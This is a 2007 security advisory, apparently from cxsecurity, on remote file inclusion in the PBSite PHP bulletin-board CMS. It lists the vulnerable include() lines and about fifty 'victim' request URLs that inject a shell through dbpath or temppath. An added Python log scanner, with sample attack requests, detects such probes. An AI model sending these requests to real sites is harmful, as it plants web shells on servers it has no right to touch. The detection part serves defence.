PBSite - PHP Bulletin Site | CMS ====> RFI

2007.06.08
Credit: pito pito
Risk: High
Local: No
Remote: Yes
CWE: CWE-98


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

script: PBSite - PHP Bulletin Site | CMS ====> RFI
url: http://sourceforge.net/project/showfiles.php?group_id=88114
author: titanichacker (the-modest-pirate (at) hotmail (dot) com [email concealed])
contact: hack-teach.com & mohandko.com & tryag.com

bug in:

./useronline.php
    include($dbpath."/settings.php");
    include($temppath."/pb/language/lang_".$language.".php");

./ucp.php
    include($dbpath."/settings.php");
    include($dbpath."/settings/styles/styles.php");

./setcookie.php
    include($temppath."/pb/language/lang_".$language.".php");
    include($dbpath.'/settings.php');

./sendpm.php
    include($dbpath."/settings.php");

./search.php
    include($dbpath."/settings.php");
    include($dbpath."/settings/styles/styles.php");
    include($temppath."/pb/language/lang_".$language.".php");

./register.php
    include($dbpath."/settings.php");
    include($dbpath."/settings/styles/styles.php");
    include($temppath."/pb/language/lang_".$language.".php");

./profile.php
    include($dbpath."/settings.php");
    include($dbpath."/settings/styles/styles.php");

./post.php
    include($dbpath."/settings.php");
    include($dbpath."/settings/styles/styles.php");
    include($temppath."/pb/language/lang_".$language.".php");
    include($temppath."/pb/language/lang_".$language.".php");

./pmpshow.php
    include($dbpath."/settings.php");
    include($dbpath."/settings/styles/styles.php");

./pm.php
    include($dbpath."/settings.php");
    include($dbpath."/settings/styles/styles.php");

./ntopic.php
    include($dbpath."/settings.php");
    include($dbpath."/settings/styles/styles.php");

./nreply.php
    include($dbpath."/settings.php");
    include($dbpath."/settings/styles/styles.php");
    include($temppath."/pb/language/lang_".$language.".php");
    include($temppath."/pb/language/lang_".$language.".php");

./news.php
    include($dbpath."/settings.php");
    include($dbpath."/settings/styles/styles.php");
    include ($dbpath."/posts/".$cat."_".$fid."_".$pid);
    include($temppath."/pb/language/lang_".$language.".php");

./memberslist.php
    include($dbpath."/settings.php");
    include($dbpath."/settings/styles/styles.php");

./logout.php
    include($dbpath."/settings.php");
    include($dbpath."/settings/styles/styles.php");
    include ($dbpath."/posts/".$cat."_".$fid."_".$pid);
    include($temppath."/pb/language/lang_".$language.".php");

./login.php
    include($dbpath."/settings.php");
    include_once("$temppath/$template/language/lang_$language.php");
    include_once("$temppath/$template/language/lang_$language.php");

./index.php
    include($dbpath."/settings.php");
    include_once("$temppath/$template/language/lang_$language.php");
    include_once("$temppath/$template/language/lang_$language.php");

./help.php
    include($dbpath."/settings.php");
    include_once($dbpath."/settings/styles/styles.php");
    include("$temppath/$template/language/lang_$language.php");

./forum.php
    include($dbpath."/settings.php");
    include($temppath."/pb/language/lang_$language.php");
    include($temppath."/pb/language/lang_".$language.".php");

./error.php
    include($dbpath."/settings.php");
    include($temppath."/pb/language/lang_$language.php");
    include($temppath."/pb/language/lang_".$language.".php");

./editpost.php
    include($dbpath."/settings.php");

./delpost.php
    include($dbpath."/settings.php");

./delpm.php
    include($dbpath."/settings.php");
    include("$temppath/pb/language/lang_$language.php");

./confirm.php
    include($dbpath."/settings.php");
    include($temppath."/pb/language/lang_".$language.".php");

./board.php
    include($dbpath."/settings.php");
    include($temppath."/pb/language/lang_".$language.".php");

./admin2.php
    include($dbpath."/settings.php");

./admin.php
    include($dbpath."/settings.php");
    include($dbpath."/settings/styles/styles.php");

./templates/pb/css/formstyles.php
    include ($dbpath."/settings/styles/styles.php");

exploit:

http://victim/path/useronline.php?dbpath=[shell]
http://victim/path/useronline.php?temppath=[shell]

http://victim/path/ucp.php?dbpath=[shell]

http://victim/path/setcookie.php?temppath=[shell]
http://victim/path/setcookie.php?dbppath=[shell]

http://victim/path/sendpm.php?dbppath=[shell]

http://victim/path/search.php?dbppath=[shell]
http://victim/path/search.php?temppath=[shell]

http://victim/path/register.php?dbppath=[shell]
http://victim/path/register.php?temppath=[shell]

http://victim/path/profile.php?dbpath=[shell]

http://victim/path/post.php?dbppath=[shell]
http://victim/path/post.php?temppath=[shell]

http://victim/path/pmpshow.php?dbppath=[shell]

http://victim/path/pm.php?dbppath=[shell]

http://victim/path/ntopic.php?dbppath=[shell]

http://victim/path/nreply.php?dbppath=[shell]
http://victim/path/nreply.php?temppath=[shell]

http://victim/path/news.php?dbppath=[shell]
http://victim/path/news.php?temppath=[shell]

http://victim/path/memberslist.php?dbppath=[shell]

http://victim/path/logout.php?dbppath=[shell]
http://victim/path/logout.php?temppath=[shell]

http://victim/path/login.php?dbppath=[shell]
http://victim/path/login.php?temppath=[shell]

http://victim/path/index.php?dbppath=[shell]
http://victim/path/index.php?temppath=[shell]

http://victim/path/help.php?dbppath=[shell]
http://victim/path/help.php?temppath=[shell]

http://victim/path/forum.php?dbppath=[shell]
http://victim/path/forum.php?temppath=[shell]

http://victim/path/error.php?dbppath=[shell]
http://victim/path/error.php?temppath=[shell]

http://victim/path/editpost.php?dbppath=[shell]

http://victim/path/delpost.php?dbppath=[shell]

http://victim/path/delpm.php?dbppath=[shell]
http://victim/path/delpm.php?temppath=[shell]

http://victim/path/confirm.php?dbppath=[shell]
http://victim/path/confirm.php?temppath=[shell]

http://victim/path/board.php?dbppath=[shell]
http://victim/path/board.php?temppath=[shell]

http://victim/path/admin2.php?dbppath=[shell]

http://victim/path/admin.php?dbppath=[shell]

http://victim/path/templates/pb/css/formstyles.php?dbpath=[shell]

thanx: cold-zero & mohandko & tryag & arb-hawk & drbaka & kof2002 & milw0rm & xp10
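
A log check for the request pattern listed above, as an added example that is not part of the original advisory or of the PBSite code. It assumes combined-format access logs and that no legitimate PBSite request sets these variables; the sample lines, addresses and hostnames are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Variables the advisory shows at the start of include() paths. "dbppath" is
# the spelling used in most of the advisory's request examples, so probes carry it.
PATH_VARS = {"dbpath", "dbppath", "temppath"}

# Prefix of an Apache/nginx "combined" access-log line (assumed log format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# Value starts with a scheme (http:, ftp:, php:, data: ...), //host or \\host.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]+:|//|\\\\)', re.I)


def classify(line):
    """Return (ip, script, variable, severity) for the first path variable set, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    if not parts.path.lower().endswith(".php"):
        return None
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        name = key.split("[")[0]              # dbpath[]=... also targets $dbpath
        if name in PATH_VARS:
            value = unquote(value)            # second decode for double-encoded values
            severity = "remote-include" if REMOTE_RE.match(value) else "path-override"
            return (m["ip"], parts.path, name, severity)
    return None


def scan(lines):
    """Classify every log line and keep only the suspicious ones."""
    return [hit for hit in map(classify, lines) if hit]


# Constructed sample log lines (documentation IP ranges, example hostnames).
SAMPLE_LOG = [
    '203.0.113.7 - - [08/Jun/2007:10:00:01 +0000] "GET /forum/useronline.php?dbpath=http://files.example/x.txt? HTTP/1.1" 200 512',
    '198.51.100.4 - - [08/Jun/2007:10:00:05 +0000] "GET /forum/index.php?temppath=ftp%3A%2F%2Ffiles.example%2Fx HTTP/1.1" 200 4096',
    '198.51.100.9 - - [08/Jun/2007:10:00:09 +0000] "GET /forum/news.php?cat=1&fid=2&pid=3 HTTP/1.1" 200 2048',
    '203.0.113.7 - - [08/Jun/2007:10:00:12 +0000] "GET /forum/admin.php?dbppath=../../tmp HTTP/1.1" 200 128',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit, sep="\t")
```
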



Copyright 2021, cxsecurity.com

 
